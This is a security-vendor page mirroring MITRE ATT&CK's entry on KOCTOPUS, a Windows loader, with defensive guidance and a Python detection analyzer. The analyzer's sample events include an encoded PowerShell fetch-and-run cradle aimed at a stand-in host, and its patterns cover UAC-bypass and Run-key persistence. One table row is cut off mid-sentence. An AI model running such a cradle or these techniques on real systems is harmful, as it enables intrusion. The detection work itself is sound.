S0669: KOCTOPUS
Analyst context for executives and security teams
KOCTOPUS matters because it is described as a Windows loader used to launch follow-on remote access tooling such as Octopus, Koadic, and in some cases QuasarRAT. For leaders, the practical issue is not only the loader itself, but whether phishing-driven script execution, PowerShell/cmd/VBA activity, registry persistence, tool transfer, and stealth behaviors would be visible quickly enough to support containment decisions.
Executive priority
Prioritize KOCTOPUS as a validation case for Windows endpoint resilience, phishing response readiness, and SOC visibility over script-based malware chains. The relationship to LazyScripter, which MITRE describes as mainly targeting the airlines industry since at least 2018, makes this especially relevant for organizations with aviation exposure or similar operational-continuity requirements. Executives should ask whether email security, endpoint logging, PowerShell/script controls, registry monitoring, and incident response evidence preservation are sufficient to reconstruct and contain a loader-to-RAT sequence.
Technical view
ATT&CK does not provide a dedicated detection section for KOCTOPUS, so defenders should validate coverage through the related behaviors: spearphishing links or attachments leading to user execution; batch, PowerShell, Windows command shell, and VBA execution; command obfuscation and deobfuscation; registry modification and Run Key or Startup Folder persistence; UAC bypass attempts; hidden windows; system information discovery; ingress tool transfer; proxy use for command and control; and possible security tool impairment or cleanup of persistence artifacts. Detection engineering should correlate email, endpoint process, script, registry, file-transfer, and network telemetry rather than relying on a single malware signature.
Likely telemetry
- Email gateway and user-reporting evidence for suspicious attachments and links
- Windows process creation telemetry for cmd.exe, PowerShell, script hosts, Office-spawned processes, and unusual parent-child chains
- PowerShell script block, module, and command-line logging where available
- Command-line content showing obfuscation, decoding, or suspicious interpreter usage
- Registry auditing for Run Keys, Startup Folder changes, and other suspicious modifications
Detection direction
- Validate phishing-to-execution correlation: email event, user interaction, spawned script/interpreter, and downloaded or launched payload should be linkable in the SOC workflow.
- Tune for suspicious Windows interpreter chains involving batch files, PowerShell, cmd, VBA, and Office-originated execution, while accounting for legitimate administrative scripting.
- Add analytic focus on obfuscated command lines and subsequent decode/deobfuscation behavior instead of matching only static strings.
- Monitor registry persistence and cleanup together; removal of persistence artifacts can be part of adversary tradecraft and may erase evidence needed by incident responders.
- Correlate ingress tool transfer with later execution of known remote access tooling families referenced by MITRE, without assuming every event is KOCTOPUS.
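The correlation logic above, as an added illustration that is not part of the page or of MITRE's content: a small Python analyzer run over constructed Sysmon-style process and registry events, flagging the Office-to-interpreter chains, encoded PowerShell with a download cradle, hidden-window switches, fodhelper/eventvwr-spawned shells, and Run key writes that this page lists. Event field names and the sample values are assumptions.

```python
import base64
import re

# Constructed sample events (not real telemetry), shaped loosely like
# Sysmon process-creation and registry-set records.
SAMPLE_PS = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/o.ps1')"
EVENTS = [
    {"type": "process", "parent": "WINWORD.EXE", "image": "wscript.exe",
     "cmdline": "wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\inv.vbs"},
    {"type": "process", "parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc "
                + base64.b64encode(SAMPLE_PS.encode("utf-16-le")).decode()},
    {"type": "registry", "image": "powershell.exe",
     "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"},
    {"type": "process", "parent": "fodhelper.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c start.bat"},
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell.exe Get-Service"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
UAC_BYPASS_HOSTS = {"fodhelper.exe", "eventvwr.exe"}   # auto-elevating hosts named on this page
RUN_KEY = re.compile(r"\\CurrentVersion\\Run", re.I)

def decode_encoded_powershell(cmdline):
    """Return the decoded -enc/-e payload (UTF-16LE base64), or None if absent or malformed."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(events):
    """Return (rule, detail) findings; each rule maps to a behavior listed on this page."""
    findings = []
    for e in events:
        image = e["image"].lower()
        if e["type"] == "process":
            parent, cmdline = e["parent"].lower(), e["cmdline"]
            if parent in OFFICE and image in INTERPRETERS:
                findings.append(("office_spawned_interpreter", f"{e['parent']} -> {e['image']}"))
            if parent in UAC_BYPASS_HOSTS and image in INTERPRETERS:
                findings.append(("uac_bypass_host_spawned_interpreter", f"{e['parent']} -> {e['image']}"))
            if re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.I):
                findings.append(("hidden_window", cmdline[:40]))
            decoded = decode_encoded_powershell(cmdline)
            if decoded is not None:   # deobfuscate first, then match on the decoded content
                findings.append(("encoded_powershell", decoded))
                if re.search(r"DownloadString|DownloadFile|Invoke-WebRequest", decoded, re.I):
                    findings.append(("powershell_download_cradle", decoded))
        elif e["type"] == "registry" and image in INTERPRETERS and RUN_KEY.search(e["key"]):
            findings.append(("run_key_set_by_interpreter", e["key"]))
    return findings
```

The explorer-launched `Get-Service` event produces no finding, which is the baseline case the tuning bullet above refers to.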
Mitigation priorities
- Reduce phishing execution risk through attachment/link controls, user reporting workflows, and rapid triage of suspected spearphishing events.
- Harden Windows script execution paths with least privilege, controlled use of PowerShell, and restrictions appropriate to business operations.
- Protect persistence points by monitoring and limiting unauthorized registry and Startup Folder changes.
- Ensure endpoint security and logging agents are tamper-resistant and generate alerts when disabled, modified, or stopped.
- Maintain egress visibility through DNS, proxy, and network logging so potential proxy or tool-transfer behavior can be investigated.
Analyst notes and limits
The supplied ATT&CK object identifies KOCTOPUS as a loader with batch and VBA variants and links it to LazyScripter and multiple techniques. The strongest defensive value is using KOCTOPUS as a scenario for validating Windows script execution, phishing response, persistence monitoring, and follow-on tool detection. Local baselines are essential because many related behaviors overlap with legitimate administration.
MITRE does not provide official detection guidance for this object, and the object’s own tactics are not specified. Several related techniques include platforms beyond Windows, but KOCTOPUS itself is supplied here as Windows; platform statements should therefore remain Windows-focused unless local evidence expands scope. No active exploitation, customer exposure, or guaranteed detection coverage is implied.
KOCTOPUS
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1685 | Disable or Modify Tools | KOCTOPUS will attempt to delete or disable all Registry keys and scheduled tasks related to Microsoft Security Defender and Security Essentials. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | KOCTOPUS has been distributed via spearphishing emails with malicious attachments. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | KOCTOPUS has deobfuscated itself before executing its commands. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1204.002 | Malicious File Sub-technique | KOCTOPUS has relied on victims clicking a malicious document for execution. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1090 | Proxy | KOCTOPUS has deployed a modified version of Invoke-Ngrok to expose open local ports to the Internet. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1112 | Modify Registry | KOCTOPUS has added and deleted keys from the Registry. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1566.002 | Spearphishing Link Sub-technique | KOCTOPUS has been distributed as a malicious link within an email. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1082 | System Information Discovery | KOCTOPUS has checked the OS version using `wmic.exe` and the `find` command. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1564.003 | Hidden Window Sub-technique | KOCTOPUS has used |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | KOCTOPUS has used `cmd.exe` and batch files for execution. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1105 | Ingress Tool Transfer | KOCTOPUS has executed a PowerShell command to download a file to the system. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1204.001 | Malicious Link Sub-technique | KOCTOPUS has relied on victims clicking on a malicious link delivered via email. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1070.009 | Clear Persistence Sub-technique | KOCTOPUS can delete created registry keys used for persistence as part of its cleanup procedure. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location Sub-technique | KOCTOPUS has been disguised as legitimate software programs associated with the travel and airline industries. (Citation: Arghire LazyScripter) |
| Enterprise | T1106 | Native API | KOCTOPUS can use the `LoadResource` and `CreateProcessW` APIs for execution. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1059.001 | PowerShell Sub-technique | KOCTOPUS has used PowerShell commands to download additional files. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1548.002 | Bypass User Account Control Sub-technique | KOCTOPUS will perform UAC bypass either through fodhelper.exe or eventvwr.exe. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1027.010 | Command Obfuscation Sub-technique | KOCTOPUS has obfuscated scripts with the BatchEncryption tool. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1059.005 | Visual Basic Sub-technique | KOCTOPUS has used VBScript to call wscript to execute a PowerShell command. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | KOCTOPUS can set the AutoRun Registry key with a PowerShell command. (Citation: MalwareBytes LazyScripter Feb 2021) |
Groups, software, and campaigns
G0140: LazyScripter
LazyScripter is a threat group that has mainly targeted the airlines industry since at least 2018, primarily using open-source toolsets.[1]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.2 | | Current bundle | 03fe1b6e635b… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] MalwareBytes LazyScripter Feb 2021. Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024.
[2] KOCTOPUS. (Citation: MalwareBytes LazyScripter Feb 2021)
[3] mitre-attack S0669.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.